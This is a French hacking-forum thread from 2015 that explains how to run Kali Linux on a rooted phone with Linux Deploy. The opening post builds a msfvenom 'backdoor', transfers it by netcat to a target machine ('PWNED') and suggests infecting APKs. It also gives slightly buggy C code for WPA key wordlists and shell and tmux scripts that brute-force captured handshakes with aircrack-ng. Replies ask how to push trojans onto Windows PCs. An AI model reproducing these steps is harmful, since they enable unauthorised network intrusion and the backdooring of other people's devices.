Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-03-2015 13:18:16

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Linux Deploy -> Kali Linux

Salut tout le monde !

J'avais apris avec joie la sortie de Nethunter pour mon Nexus 4, mais finalement il s'est avéré que mon pauvre smartphone ne le supportait pas.. :'(
Mais plein d'enthousiasme je me suis rabattu vers une autre et aussi bonne solution Linux Deploy.

Je pensais cette app assez limitée MAIS en réalite on peut obtenir presque la meme chose qu'un nethunter :

kali

Donc voila :
1) Rootez votre tel
2) Installez linux deploy

3) Téléchargez l'image de kali : cf le schema suivant

install

NOTE : L'installateur va vous pomper automatiquement 4Go de memoire. 4Go c'est gros, TRES gros (comme ma b..)
Donc soit vous le mettez sur une carte SD SOIT vous faites comme moi :
- Allez dans "Image size (MB)" et mettez a peu pres 2200 soit 2,2 Go
- descendez dans "Select Components" et DECOCHEZ TOUT SAUF SSH SERVER (vous virez Desktop environement VNC server X server et kali components)

Ainsi la taille de votre image n'est "que" de 2,2Go et vous avez a peu pres 1,5 go de libre sur l'image pour personalisser Kali.
Car oui vous installez une image "vide" de Kali.

C'est la que ma méthde differe. Alors que partout sur internet on vous parle d'installer un kali complet a 6 Go moi je dis c'est nimporte quoi.
Bref.
Appuyez sur "Install" patientez quelques minutes.

install

Que faire maintenant ?
Installez un client ssh ou utilisez "Terminalide". (terminalide est le terminal emulator de jack palevitxh en 100 fois mieux. Dailleurs je hais son emulateur.) Je prefere utiliser le client ssh qui est beaucpup plus leger (en memoire)
J'utilise celui perso :
client ssh
Il est simple et sans autorisation chelou.

Ah et le "hacker's Keyboard" est utile ou si vous avez termialide utilsez celui de termnalide je le prefere

Voili voulou.

Lancez désormais le tout avec le petit bouton start :
Vous devriez voir un truc dans ce genre :

mount

SAUF QUE vous n'avez installé que le SSH donc vous devriez voir

SSH :22 ... done
VNC :5900 ... fail

Et c'est normal, cest parfait.

Lancez donc votre ssh client :
ssh client2

En bas vous devez ecrire en face de ssh :

[ssh] [email protected]

Connectez vous : le mot de passe est

changeme

Et hop vous etes dedans.
Astuce : si le zoom est trop petit appuyez sur les touches de volumes pour aggrandr/reduire.

Maintenant ammusez vous !

1) Verifiez l'espace disponible de temps a autre :

df -h

2) Become root : su

3) Installez les packages que vous souhaitez

/!\ ATTENTION : Les cartes wifi des smartphones ne supportent pas l'injection. Une bande de ptit genies ont reussi mais cest experimental donc vous ne pourrez pas injecter de packets ni devenir montor. Donc le sniffing/airodump/wifite/reaver &cie ne fonctionne pas snas clé wifi usb externe. Suivez CE tuto pour les cles wifi externe :
xda

L'essentiel pour samuser :
- aircrack-ng pour casser un handshake (petit tuto en dessous)
- Metasploit pour le bonheur (petit tuto dessous)
- Tmux car cest chaud on a qu'une seule fenetre
- GCC pour compiler vos programmes
- Vim pour les editer (parceque vi cest caca)
- Le reste wink

Donc :
1) devenez root : su
Pour ceux qui buguent sur la commande su qui demande un mot de passe et que "changeme" ne fonctionne pas, réalisez la manip suivante :

sudo passwd root
entrez deux fois votre mot de passe

2) Installez les packages :

apt-get install aircrack-ng
apt-get install metasploit
apt-get install metasploit-framework
apt-get install tmux
apt-get install john

3) Pour le SET (Social engineering toolkit :

cd /opt
sudo apt-get install git
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
cd set/
python setup.py install

Voili voulou.

Bon le souci me direz vous c'est comment mettre des données dans l'mage disque (linux.img)
EDIT : Il y a deux possibilités :
1) Allez dans les parametres de telechargement, descendez tout en bas et tapez sur "Custom mounts" puis sur "Mount points" puis appuyez sur le chemin que vous avez.
Cela vous permetra, une fois l'image bootée de pouvoir acceder à l'integralité des données presentes sur la memoire interne/carte SD  de votre telephone et et de les copier/modifier/.... INFECTER UNE APK AVEC MSFVENOM !!!

2)Une autre astuce (avec un pc ayant linux ou Windows avec netcat - j'ai pas ressi avec les servers ftp) consiste a  utiliser la commande nc pour transferer des fichiers via internet :

Vous voulez envoyer une backdoor crée par msfvenom ?
Pas de soucis :

Sur le telephone - kali linux deploy

msfvenom  /votre/payload/ OPTIONS -a VOTRE_ARCH -e exe et tout ce que tu veux > mybackdoor
nc -w 3 ADRESSEIP_RECEVEUR PORT < mybackoor

Sur la machine receveuse

nc -l -p 1234 > mybackdoor

Ou tout simplement branchez votre cable, et les drivers et hop faies glisser la backdoor sur le pc local

Un ptit screen ?
metasploit1
metasploit2

ET .... PWNED !! (oui bn je sais hein c'etait facile wink )
metasplot pwned



Et ca marche avec NIMPORTE quel fichier :
Exeple : Vous avez capturé un handshake sur votre pc , vous pouvez l'envoyer de cette maniere la.
Astuce : Réduisez la taille du fichier avec wpaclean

wpaclean <out.cap> <in.cap>

Cependant la vitesse affichée (pour moi 1000k/s) est bien inferieure a la vtesse réelle. Je dirai la vitesse est reelle est celle estimée divisé par trois hmm

Mais comment craquer la clé me direz vous ? On a pas d'espace pour les dico.
Et bien téléchargez john par exemple ou encore le code source du LiveBoxgenerator de Sdpbz1
liveboxgenerator

Ou bien ma version améliorée du liveboxgenerator qui s'apelle donc maintenant HexKey_Genrator:

http://crack-wifi.com/forum/topic-11166 … torsh.html

Voici le code de HexKeyGenerator, basée sur le programme de Sdpbz1 sur le quel 'ai fait les améliorations dont il parlait :

// Autheurs : Sdpbz1 Et amélioré par romeoandjuliet
 
 #include <stdio.h>
 #include <stdlib.h>
 #include <time.h>
 
 
 void help(char name[]) {
	printf("Usage:%s <nombre de clefs a générer> <fichier>\n\n", name);
	printf("Exemple: Génération de 10 millions de clefs aléatoire dans le fichier liveboxwpa\n");
	printf("%s 10000000 liveboxwpa\n", name);
 }
 
 
 int main(int argc, char * argv[])
{
       long long int nb; !!!MODIFICATION!!! long lon int
	int size; //Longueur des clef, adaptable !!!MODIFICATION!!!
	double i, z; //pour deux boucles lors de la génération des clefs !!!MODIFICATION!!! double et pas int
	int octet = 0;
	
	FILE *PF1;
	
	//Test des arguments, 2 obligatoires
	if(argc != 4) {                                    // MODIFICATION Le 4eme argument pour la taille de la clé pour plus de flex
		help(argv[0]);
		return 1;
	}
	
	//Conversion en long et verificaton 
	nb = atol(argv[1]);
	if(nb == 0) {
		printf("Merci d'entrer un nombre valide!\n");
		help(argv[0]);
		return 1;
	}

       size = atol(argv[3]); // !!!MODIFICATION!!! Ajout du 4eme argument
	if(nb == 0) {
		printf("Merci d'entrer un nombre valide!\n");
		help(argv[0]);
		return 1;
	}
	
	//Creation du fichier... ou non
	PF1 = fopen(argv[2], "w");
	if (PF1 == NULL) {
		printf("Impossible de créer le fichier %s\n", argv[2]);
		return 1;
	}
	
	
	printf("Génération de %d clef WPA pour Livebox\n", nb);
	
	
	/*
	Génération des clefs WPA, les boucles partent de 1 pour simplifier 
	et on affiche le compteur tous les 100.000 clefs crées
	On pourait optimiser les I/O ici: mettre 10000 clefs dans un buffer et l'écrire dans le fichier dès qu'il est plein
	*/
	srand(time(NULL));
	
	for(z = 1; z <= nb; z++) {
		for (i = 1; i <= size; i++) {
			octet = rand() % 256;
			fprintf(PF1,"%02X", octet); //Affichage en hexadecimal
		}
		if(z % 100000 == 0) {
			printf("%l clef générées\n", z); // !!!MODIFICATION!!! %l et pas %d
		}
		fprintf(PF1,"\n");
	}
	
	fclose(PF1);
	
	return 0;
}

Ainsi que le code également présent sur le meme thread mais cette fois ci revu pour le shell ssh : Voici startup.sh

for i in `seq 1 1000000``
   do
	./liveboxgenerator 1000000 password$i.lst   # Longeur_de_la_clé_eg:10  -> Ajoutez la longueur de la clé si vous utilisez ma version modifiée (cf si dessous du liveboxgenerator
	aircrack-ng /path/to/handshake -e ESSID -w password$i.lst -p #NOMRE_DE_CORES >> log.txt # FAITES GAFFE SI VOUS UTILISEZ TOUS LES CORES VOTRE TELEPHONE LAG A MORT
	if grep "KEY FOUND" log.txt # grep retourne 1 si la clé est présente
	   then
		grep "KEY FOUND" log.txt > KEY_FOUND # On sauve la clé
		grep "KEY FOUND" log.txt 
               grep "KEY FOUND" log.txt 
	fi
done

Et voici le script tmux pour le faire tourner et verifier l'avancement : launch.sh

SESSION=$USER
tmux split-window -h
tmux select-pane -t 0
tmux send-keys "sh ./startup" C-m
tmux select-pane -t 1
tmux send-keys "Watch -n 30 grep KEY log.txt" C-m
tmux split-window -v
tmux send-keys "Watch -n 30 tail log.txt" C-m # pour verifier la vitesse

tmux select-window -t $SESSION:1
tmux -2 attach-session -t $SESSION

Edit & Note : J'ai chourré et modifié ce script depuis ce site (oui parce que je suis nul en tmux !)
http://blog.htbaa.com/news/tmux-scripting

Lancez le processus avec launch.sh (i vous faut le hanshake, HexKey_Generator et startup.sh dans le repertore)
Un ptit screen ?
aircrack-ng with my tmux script

Voila Voila! LA les possibilités sont infinies. Pour conclure je dirais meme que je recommande plus le linux deploy que le nethunter

FUCKING ENJOY !

Dernière modification par romeoandjuliet (16-03-2015 18:26:55)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-03-2015 14:03:55

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Linux Deploy -> Kali Linux

Excellent thème et une très bonne nouvelle pour tous ceux qui ont des téléphones un peu trop "faible" pour tourner avec nethuntter.
Il y a de quoi monter des scénarios à la james bond cool big_smile

j'ai décidé de mettre une épingle au sujet... tu nous as même gratifié d'un script modifié et tout... merci l'ami big_smile

Dernière modification par kcdtv (16-03-2015 14:10:52)

Hors Ligne

#3 16-03-2015 14:11:39

romeoandjuliet
Membre Actif
Inscription : 23-02-2015
Messages : 25

Re : Linux Deploy -> Kali Linux

Ah merci pour l'épingle c'est cool smile et aussi pour le coup de main sur mon précédents script !
Logiquement on peut faire a peu pres tout ce qu'on veut.

Et je voudrai aussi souligner un des liens que j'ai mis dans le premier postt pour pouvoir utiliser une clé usb wifi pour la possibilté de monitor mode & injection :
http://forum.xda-developers.com/google- … e-t2852293

Mais dis moi,
Est ce que t'aurais une solution a ce souci :
L'environement linux deploy est un chroot. Par conséquent en jouant avec linux deploy on est "enfermé" dans l'image linux. On peut pas interagir avec le reste de la memoire du telephone.
Du coup c'est ennuyant pour transferer des données depuis notre enironement chroot vers l'exterieur.
La seule option que j'ai exploitée est l'envoi de codes sorces/programmes/backdoor via le netcat. Or netcat n'est pas toujours dispo sur du Windows ou d'autres machines...
Du coup est ce que t'as une idée pour le transfert de données ? Du command-line Bluetooth/usb ? Je suis pas tres bon sur ce coté la.
Et pour le coté Windows, est ce que tu connais un moyen equivalent a netcat pour transferer programmes/trojan a un pc ? Sur le mien, branché sur un meme reseau, j'ai pas reussi avec netcat, ni meme avec des serveurs ftp tels que filezilla ou ftpmachin x) Y a til une 'built-in command' pour transferer des données ? J'ai franchement galéré hmm

Sinon on est obligé de passer par un linux intermediaire, lui envoyer nos programmes en netcat puis ensuite envoyer sur une cle usb

Dernière modification par romeoandjuliet (16-03-2015 14:20:08)

Hors Ligne

#4 20-11-2015 16:16:37

gh0strank
N00b
Inscription : 20-11-2015
Messages : 3

Re : Linux Deploy -> Kali Linux

Bonjour tous le monde,

Je viens de m'inscrire expres pour mettre a jour ton tuto.

J'ai crée le mien et c'est aussi simple.

Hors Ligne

#5 03-10-2016 18:20:06

hellblob
N00b
Inscription : 03-10-2016
Messages : 1

Re : Linux Deploy -> Kali Linux

Salut !

Merci pour ce post !
Mais en ce qui concerne aircrack-ng, comment l'utiliser sans perdre la connexion au serveur dans la mesure ou il faut etre en mode moniteur ?

>> airmon-ng start wlan0
me deconnecte evidemment

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]